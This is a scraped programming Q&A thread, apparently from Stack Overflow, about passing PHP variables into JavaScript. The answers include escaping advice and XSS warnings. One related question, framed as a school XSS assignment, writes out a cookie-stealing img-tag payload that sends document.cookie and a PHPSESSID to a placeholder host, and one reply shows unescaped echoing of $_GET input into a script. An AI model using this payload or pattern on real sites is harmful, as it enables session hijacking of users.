I want to access PHP(server side file variables) with JavaScript(Client side script) without using MySQL. e.g. i have $name=Tom; How do i access this $name variable in JavaScript? Please show code example as i am new to programming. Thank you.
You could do something like
<script>
php_variable = <?= json_encode($php_variable) ?>;
</script>
which should even let you do arrays and possibly objects. It requires PHP 5.2 or later, though. If you're stuck without json_encode, you could wrap quotes around a call to addslashes, but that won't let you do arrays and such.
If your intent is to set the value within some form, you can do like
<input type="text" name="stuff" value="<?= htmlentities($stuff) ?>">
and of course, you could access that element's value within your script if necessary.
Two key points to take away here:
Since PHP is generating the page, it can output stuff as it pleases -- even right in the middle of a <script> element. You can use this to transfer variables from server to client, but not vice versa. (Transferring client variables...well...that's effectively going to require XHR or a form submit.)
But always* escape stuff going from PHP to anywhere -- particularly if it's going into HTML, JS, or directly into SQL. Unless you have your server set all retarded (enabling magic quotes, for example), PHP will get the data raw, and it could have special chars that will cause one or all of those to break.
* Ok, not quite always. If you have a PHP variable that contains some HTML or JS you want to output as HTML/JS, then don't escape it. But you should be aware of what "XSS" means, and don't blindly output data supplied by a user.
Since javascript is client side and php is server side, you would need to use ajax(javascript) to access server side session variables(php). I would recommend researching jquery's ajax framework.
you can do this simple things.
function reset1()
{
//document.frmadd.intFaqCategoryTypeID.value='1';
document.frmadd.reset();
document.frmadd.intChatRoomCategoryId.value='<?php echo $intChatRoomCategoryId ; ?>';
document.frmadd.intEventId.value='<?php echo $intEventId ; ?>';
document.frmadd.intGroupId.value='<?php echo $intGroupId ; ?>';
document.frmadd.intMemberID.value='<?php echo $intAddedByMemberId ; ?>';
return false;
}
Related
I would like to pass a variable as a value to a website. (Doing a school assignment on XSS)
For example I currently have:
$.cookie('echat') and $.cookie('PHPSESSID')
I would like to pass it into a link say:
xxxx.com/xxx.php?cookie=$.cookie('PHPSESSID')
However, nothing is pass to xxxx.com/xxx.php
Any1 know the syntax to do this?
specifically i am placing a img tag like this to exploit:
< img src='http://xxxxx.com/xxxxx.php?cookie='+document.cookie>
Apparently, document.cookie is not working and I need $.cookie('PHPSESSID') to get the PHPID
Your URL is setting the value of $_GET['cookie'] to $.cookie('PHPSESSID') in your PHP script, nothing more. How that's handled is up to PHP.
Since that looks like JavaScript (specifically, the jQuery Cookie plugin), you could conceivably do echo "<script>{$_GET['cookie']}</script>"; in your PHP to spit it out as JS on the resulting page. As you hopefully know from your classes, blindly using user-submitted data like this is dangerous and a bad idea.
use this php function
url_encode("string")
such as
http://www.xxxxx.com/xxx.php?cookie=<?php echo url_encode("$.cookie('PHPSESSID')"); ?>
I created now a Javascript Code that get the php variable into javascript code, my issue that the php variable is important and I don't want any can see this variable is there is any way to do that by the way I tried to use obfuscator but it doesn't work because of the PHP code inside the Javascript code, let's say this is my Code,
<?php
$var = "this is impotant";
?>
<script type="text/javascript">
var javaScriptVar = "<?php echo $var; ?>";
</script>
So, is there any way to use PHP variables in Javascript code or hide the result of the PHP code?
Nobody sees the PHP code. But if you expose values into Javascript, they are not secret anymore. There is no way to deal with this. You cannot use the value in Javascript and NOT reveal it.
If you want to keep process data secret on the server, and available for the next request of that user, use a session.
People will only see the value of the variable. They wont know what it is or how important it is supposed to be. Nobody will see the variable name because the PHP code is executed BEFORE the page is sent to the client. Therefore there is no need to obfuscate the value, and you cant anyway since you need the value.
An example. if I use this PHP code in my file
<p>Hello Mr <?php echo $MY_SUPER_SECRET_VARIABLE ?></p>
the only thing people will be able to see in the source when the page loads is
<p>Hello Mr Bond</p>
The same rule applies if it is placed in Javascript
First you need to understand that Javascript is executed on the client side, every piece of code and variable are in some way accessible by someone with some programming background.
Although you can obfuscate the source code and encrypt the variable to make it harder to read, there is no 100% protection when things happen on client side.
who wants to get the value, will get it. but you can
dynamically inject them via ajax
encode (base64 etc.) the value
obfuscate the code
PHP files will be interpreted into static (like html or xml format) file, means that all variables will be replaced with certain values.What users see is static, no php code displayed but just interpreted text.
I have one line of JavaScript that I'd appreciate help with.
req.open("GET", 'update.php?id=<?php $id ?>', true);
Where $id = 12345, I am trying to get the contents of update.php?id=12345.
Using PHP inside this JavaScript doesn't seem to be working for me.
Any suggestions?
First, make sure that you are actually inside a PHP file, or have your server configured to process whatever file extension you are using with PHP.
Then, you can echo data directly into the JavaScript. For best compatibility and to avoid potential XSS vulnerabilities, always JSON-encode the data.
req.open('GET', 'update.php?id=' + <?php echo json_encode($id); ?>, true);
Personally, I prefer to have a block of variables that are assigned over from PHP. this keeps your JavaScript cleaner.
<?php
$options = new stdClass();
$options->id = 12345;
$options->dinnerSelection = 'pizza';
echo 'var options = ', json_encode($options), ';'
?>
// Then later on in your JS...
req.open('GET', 'update.php?id=' + options.id, true);
You have some way to do this.
First one make your javascript file in .php file(be carrefull you need to include it and not to link it in the begin of file.
Second one, in php, you can wrote
<?php
echo '
<script type="text/javascript">
id="'.$id.'";
</script>';
?>
with this, you define a global variable in javascript who take the good value.
Then you just have to wrote after this :
req.open("GET", 'update.php?id='+id, true);
if you have to change the id after requied the page, you just have to change the id javascript value
I believe it would be a very poor design decision to use PHP to format your javascript in this way. You should provide more info about what you're trying to do because I can almost guarantee you that there is a better way to do this.
If you are trying to, for instance, do a javascript call to a URL (clearly), then apply that data to an attribute in the HTML document:
<div id="someExample">
Item 12345
</div>
And then use unobtrusive javascript to access that item when clicked, cancelling the link's default action if necessary. The benefits of this approach are many- you can write reusable code, and you don't have extra PHP parsing to do in a javascript that is going to be extremely hard to understand later.
Adding JS hardcoded data via PHP to a javascript object is a very poor design decision. If you need more help on this let me know, but try researching it more first!
How can i assign a javascript value to a php variable,
This is what i want to do:
<?php
$pag = echo "<script language ='javascript'>var pn = document.getElementById('t').value;
document.write(pn); </script>";
?>
But getting error as: Parse error: syntax error, unexpected T_ECHO
or is there any other way to do, but i want to assign that valur to php variable.
can somebody help here?
First, you can't give an "echo" to a variable. echo send a string or an information to the browser.
Then, you need to understand that Javascript is interpreted on the browser and PHP on the server.
It means, PHP can send variable to javascript (in an ugly and static way or with Ajax) but Javascript can't, unless you use it to change page sending the variable via GET or via AJAX.
Finally you should tell us what you need that for...
Javascript is client side, all PHP code is loaded by the server, before sending to the client. Thus, the only way to access JS variables in PHP is by setting a cookie in js, or by using AJAX
If you want to assign the value to a variable and then echo it out, use this code instead:
<?php
$pag="<script language ='javascript'>var pn = document.getElementById('t').value; document.write(pn); </script>";
echo($pag);
?>
Edit
Looking back over your question it would be good if you could explain exactly what you're trying to achieve.
Remove the echo.. You're assigning to a variable, not outputting anything.
Suppose you have access to a script which will print or echo an ID string, given a name string, i.e., something like:
http://www.example.com/script.php?name=aNameString
outputing an ID string.
I want to create a script which will allow me to retrieve anIDString, given that I already have a variable holding aNameString, i.e., something like this pseudocode:
$name="Homer Simpson";
$id='www.example.com/script.php?name=$name';
Can you help me understand how I'd do this? ... Thanks, as always!
If you are writing code on the same domain, for security reasons you might consider the include() or require() functions instead, and implementing what you need as a function in php. This way, there is no risk to your server being fed rubbish data and crashing your application.
If you need to pull data from another script do so with care, especially a server that isn't trusted. That said, you can do it with either: http://uk.php.net/curl or http://us2.php.net/manual/en/function.file-get-contents.php, the latter of which looks easier to me.
Try requiring the file, but remember, you'll need to call the function later.
<?php
$name = 'Homer Simpson';
require 'script.php';
?>
That will make the global variable $name, accessible by script.php
However, if it isn't your server, you will need to use a tool like curl to fetch the page.
In the simplest case, you can use the HTTP wrappers to get the output:
$html = file_get_contents('http://www.example.com/script.php?name=aNameString');
and them take the $html apart, unless you meant something different by "outputing an ID string", it output raw text and not html.